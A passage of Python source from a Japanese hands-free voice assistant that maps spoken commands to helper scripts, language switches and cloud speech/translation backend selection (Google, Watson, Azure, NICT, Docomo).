or (procText == u'翻訳紹介') or (procText == u'翻訳診断') \
or (procText == u'連携紹介') or (procText == u'連携診断') \
or (procText == u'今何時') or (procText == u'今何時?') \
or (procText == u'現在地') or (procText == u'ここはどこ') \
or (procText == u'個人の予定') or (procText == u'個人のスケジュール') \
or (procText == u'会社の予定') or (procText == u'会社のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール') \
or (procText[-4:] == u'電話して' or procText[-5:] == u'ラインして') \
or (procText[-2:] == u'経路' or procText[-2:] == u'道順') \
or (procText[-2:] == u'時間' or procText[-2:] == u'時刻') \
or (procText[-3:] == u'調べて' or procText[-3:] == u'教えて') \
or (procText[-4:] == u'ニュース') \
or (procText[-3:] == u'の天気'):
qLogOutput(procText)
if (not bgm_control is None):
if (cmdBgm != ''):
try:
w = codecs.open(qCtrlBgm, 'w', 'shift_jis')
if (cmdBgm != '_close_'):
w.write(procText)
else:
w.write(cmdBgm)
w.close()
w = None
except:
w = None
if (not web_control is None):
if (cmdWeb != ''):
try:
print ('web control' + cmdWeb)
w = codecs.open(qCtrlWeb, 'w', 'shift_jis')
w.write(cmdWeb)
w.close()
w = None
except:
w = None
if (not chatting_control is None):
if (cmdChatting != ''):
try:
w = codecs.open(qCtrlChatting, 'w', 'shift_jis')
w.write(cmdChatting)
w.close()
w = None
except:
w = None
if (not knowledge_control is None):
if (cmdKnowledge != ''):
try:
w = codecs.open(qCtrlKnowledge, 'w', 'shift_jis')
w.write(cmdKnowledge)
w.close()
w = None
except:
w = None
if (not vision_control is None):
if (cmdVision != ''):
try:
w = codecs.open(qCtrlVision, 'w', 'shift_jis')
w.write(cmdVision)
w.close()
w = None
except:
w = None
else:
if (not web_control is None):
if (cmdLang == 'ja'):
try:
print ('web control' + procText)
w = codecs.open(qCtrlWeb, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
if (not chatting_control is None):
if (cmdLang == 'ja'):
try:
w = codecs.open(qCtrlChatting, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
if (not knowledge_control is None):
if (cmdLang == 'ja'):
try:
w = codecs.open(qCtrlKnowledge, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
procText=''
if (procText != ''):
#time.sleep(2.00)
if (qBusyCheck(qBusyCtrl , 0) != 'busy'):
qBusySet(qBusyCtrl, True)
#qBusyCheck(qBusyCtrl , 3)
#qBusyCheck(qBusySTT , 3)
#qBusyCheck(qBusyTTS , 3)
qBusyCheck(qBusyPlay , 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qBusyCheck(qBusyInput , 3)
if (cmdBgm == '_open_'):
if (bgm_control is None):
bgm_control = subprocess.Popen(['python', '_handsfree_bgm_control.py', runMode, qCtrlBgm, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#bgm_control.wait()
#bgm_control.terminate()
#bgm_control = None
if (cmdBgm == '_close_'):
if (not bgm_control is None):
bgm_control.wait()
bgm_control.terminate()
bgm_control = None
if (cmdWeb == '_open_'):
if (web_control is None):
web_control = subprocess.Popen(['python', '_handsfree_web_control.py', runMode, qCtrlWeb, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#web_control.wait()
#web_control.terminate()
#web_control = None
if (cmdWeb == '_close_'):
if (not web_control is None):
web_control.wait()
web_control.terminate()
web_control = None
if (cmdChatting == '_open_'):
if (chatting_control is None):
chatting_control = subprocess.Popen(['python', '_handsfree_chatting_control.py', runMode, qCtrlChatting, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#chatting_control.wait()
#chatting_control.terminate()
#chatting_control = None
if (cmdChatting == '_close_'):
if (not chatting_control is None):
chatting_control.wait()
chatting_control.terminate()
chatting_control = None
if (cmdKnowledge == '_open_'):
if (knowledge_control is None):
knowledge_control = subprocess.Popen(['python', '_handsfree_knowledge_control.py', runMode, qCtrlKnowledge, '', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#knowledge_control.wait()
#knowledge_control.terminate()
#knowledge_control = None
if (cmdKnowledge == '_close_'):
if (not knowledge_control is None):
knowledge_control.wait()
knowledge_control.terminate()
knowledge_control = None
if (cmdVision == '_open_'):
if (vision_control is None):
vision_control = subprocess.Popen(['python', '_vision_v3__capture.py', runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#vision_control.wait()
#vision_control.terminate()
#vision_control = None
if (cmdVision == '_close_'):
if (not vision_control is None):
vision_control.wait()
vision_control.terminate()
vision_control = None
if (procText == u'言語は何ですか') or (procText == u'何語ですか'):
speechtext = u'この翻訳機能は、'
speechtext += u'日本語、英語、アラビア語、スペイン語、ドイツ語、フランス語、'
speechtext += u'イタリア語、ポルトガル語、ロシア語、トルコ語、ウクライナ語、'
speechtext += u'インドネシア語、ミャンマー語、タイ語、ベトナム語、'
speechtext += u'中国語ならびに韓国語'
speechtext += u'に翻訳できます。あなたは何語を話しますか?'
speechtext += u'「konsan」にはシンプル英文メッセージでお願いします。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'en', speechtext, )
if (procText == u'日本語' and qLangOut != 'ja'):
qLangOut = 'ja'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'英語' and qLangOut != 'en'):
qLangOut = 'en'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'アラビア語' and qLangOut != 'ar'):
qLangOut = 'ar'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'スペイン語' and qLangOut != 'es'):
qLangOut = 'es'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ドイツ語' and qLangOut != 'de'):
qLangOut = 'de'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'フランス語' and qLangOut != 'fr'):
qLangOut = 'fr'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'イタリア語' and qLangOut != 'it'):
qLangOut = 'it'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ポルトガル語' and qLangOut != 'pt'):
qLangOut = 'pt'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ロシア語' and qLangOut != 'ru'):
qLangOut = 'ru'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'トルコ語' and qLangOut != 'tr'):
qLangOut = 'tr'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ウクライナ語' and qLangOut != 'uk'):
qLangOut = 'uk'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'インドネシア語' and qLangOut != 'id'):
qLangOut = 'id'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ミャンマー語' and qLangOut != 'my'):
qLangOut = 'my'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'タイ語' and qLangOut != 'th'):
qLangOut = 'th'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ベトナム語' and qLangOut != 'vi'):
qLangOut = 'vi'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'中国語' and qLangOut != 'zh'):
qLangOut = 'zh'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'韓国語' and qLangOut != 'ko'):
qLangOut = 'ko'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'デモ紹介') or (procText == u'デモンストレーション'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'demo', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'自己紹介') or (procText == u'自己診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, 'all', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'翻訳紹介') or (procText == u'翻訳診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'翻訳', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'ハンズフリー紹介') or (procText == u'ハンズフリー診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'ハンズフリー', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'連携紹介') or (procText == u'連携診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'連携', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'今何時') or (procText == u'今何時?'):
#now2=datetime.datetime.now()
#speechtext = u'日本の現在の時刻は、'
#speechtext += now2.strftime('%H') + u'時'
#speechtext += now2.strftime('%M') + u'分です'
#control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'ja,hoya,今なんじ?'
if (qApiOut == 'google'):
smart = 'alexa'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
elif (qApiOut == 'free' or qApiOut == 'winos'):
smart = 'clova'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
else:
smart = 'google'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'現在地') or (procText == u'ここはどこ'):
speechtext = 'ja,hoya,' + procText + '?'
smart = 'siri'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'会社の予定') or (procText == u'会社のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
speechtext = u'ja,hoya,今日の予定教えて?'
smart = 'alexa'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
time.sleep(10.00)
if (procText == u'個人の予定') or (procText == u'個人のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
speechtext = u'ja,hoya,今日の予定教えて?'
smart = 'google'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-4:] == u'電話して' or procText[-5:] == u'ラインして'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'clova'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-2:] == u'経路' or procText[-2:] == u'道順'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'siri'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-2:] == u'時間' or procText[-2:] == u'時刻'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'auto'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-3:] == u'調べて' or procText[-3:] == u'教えて'):
speechtext = procText + '?'
knowledge_onece = subprocess.Popen(['python', '_handsfree_knowledge_control.py', runMode, '', speechtext, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
knowledge_onece.wait()
knowledge_onece.terminate()
knowledge_onece = None
if (procText[-4:] == u'ニュース'):
rss = subprocess.Popen(['python', '_handsfree_rss_search.py', runMode, procText, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#rss.wait()
#rss.terminate()
#rss = None
if (procText[-3:] == u'の天気'):
weather = subprocess.Popen(['python', '_handsfree_weather_search.py', runMode, procText[:-3], ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#weather.wait()
#weather.terminate()
#weather = None
if (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation'):
locked_ai = True
speechtext = u'ja,hoya,クラウドAIの切り替えをロックします。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'クラウドAIの切り替えをロックしました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'再起動以外解除できません。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'ai list') or (procText == 'api list'):
speechtext = u'ja,hoya,利用可能なAIをお知らせします。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'現在利用可能なクラウドAIは、次の通りです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'グーグルクラウドプラットホームのAI。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'IBMのクラウドAI「WATSON」。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'マイクロソフトのクラウドAI「azure」。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'国立法人の情報通信研究機構「NICT」のクラウドAI。'
control_speech('05', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'携帯電話会社「ドコモ」の音声認識機能、雑談会話機能、知識データベース検索機能。'
control_speech('06', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'「HOYA」の音声合成機能。'
control_speech('07', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'また、場合により外部スマートスピーカー、iPhoneとも連携できます。'
control_speech('08', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'クラウドAIを切り替えしますか?'
control_speech('99', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'default' or procText == 'by default') and (locked_ai == False):
if (qApiInp == 'free') and (qApiTrn == 'free') \
and (qApiOut == 'free' or qApiOut == 'winos' or qApiOut == 'macos') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にデフォルト設定で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,デフォルト設定に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = 'free'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
useApi = qApiInp
speechtext = u'音声認識機能と翻訳機能は、グーグルクラウドプラットホームのAIで処理します。'
control_speech('01', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
if (qApiOut == 'winos'):
speechtext = u'音声合成機能は、WINDOWSのOSで処理します。'
elif (qApiOut == 'macos'):
speechtext = u'音声合成機能は、MacのOSで処理します。'
else:
speechtext = u'音声合成機能も、グーグルクラウドプラットホームのAIで処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, 'free', qLangInp, qLangOut, speechtext, False)
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, False)
if (procText == 'special') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'azure') and (qApiOut == 'watson') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にスペシャル設定で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,スペシャル設定に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'azure'
qApiOut = 'watson'
useApi = qApiInp
speechtext = u'こんにちは。私はグーグルクラウドプラットホームのAIです。'
control_speech('01', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('02', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
useApi = qApiTrn
speechtext = u'こんにちは。私はマイクロソフトのクラウドAI「azure」です。'
control_speech('03', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、マイクロソフトのクラウドAI「azure」が処理します。'
control_speech('04', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
useApi = qApiOut
speechtext = u'こんにちは。私はIBMのクラウドAI「WATSON」です。'
control_speech('05', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、IBMのクラウドAI「WATSON」が処理します。'
control_speech('06', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('07', fileId, runMode, micDev, qApiInp, qApiInp, qLangInp, qLangOut, speechtext, False)
control_speech('08', fileId, runMode, micDev, qApiTrn, qApiTrn, qLangInp, qLangOut, speechtext, False)
control_speech('09', fileId, runMode, micDev, qApiOut, qApiOut, qLangInp, qLangOut, speechtext, False)
if (procText == 'google') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にグーグルクラウドプラットホームのAIで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,グーグルクラウドプラットホームのAIに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'google'
qApiOut = 'google'
speechtext = u'こんにちは。私はグーグルクラウドプラットホームのAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'ibm' or procText == 'watson') and (locked_ai == False):
if (qApiInp == 'watson') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にIBMのクラウドAI「WATSON」で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,IBMのクラウドAI「WATSON」に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'watson'
qApiTrn = 'watson'
qApiOut = 'watson'
speechtext = u'こんにちは。私はIBMのクラウドAI「WATSON」です。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、クラウドAI「WATSON」が処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'microsoft' or procText == 'azure' or procText == 'azur') and (locked_ai == False):
if (qApiInp == 'azure') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にマイクロソフトのクラウドAI「azure」で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,マイクロソフトのクラウドAI「azure」に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'azure'
qApiTrn = 'azure'
qApiOut = 'azure'
speechtext = u'こんにちは。私はマイクロソフトのクラウドAI「azure」です。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、クラウドAI「azure」が処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'nict') or (procText == 'n i c t')) and (locked_ai == False):
if (qApiInp == 'nict') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既に情報通信研究機構「NICT」のクラウドAIで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,情報通信研究機構「NICT」のクラウドAIに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en'
qApiInp = 'nict'
qApiTrn = 'nict'
qApiOut = 'nict'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'contest') or (procText == 'contests')
or (procText == 'contesting possession')) \
and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'nict') \
and ((qApiOut == 'watson') or (qApiOut == 'winos') or (qApiOut == 'macos')) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にPOCコンテストモードで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,POCコンテストモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en,fr,zh,ko,'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'nict'
qApiOut = 'watson'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、WINDOWSのOSが処理します。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'presentation') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'nict') \
and (qApiOut == 'none') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にプレゼンテーションモードで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,プレゼンテーションモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en,fr,zh,ko,'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'nict'
qApiOut = 'nict'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、停止します。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'プレゼンテーションの準備OKです。スタンバイしています。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qApiOut = 'none'
if ((procText == 'docomo')) and (locked_ai == False):
if (qApiInp == 'docomo'):
speechtext = u'ja,hoya,既に「ドコモ」の音声認識機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,「ドコモ」の音声認識機能に移行します。'
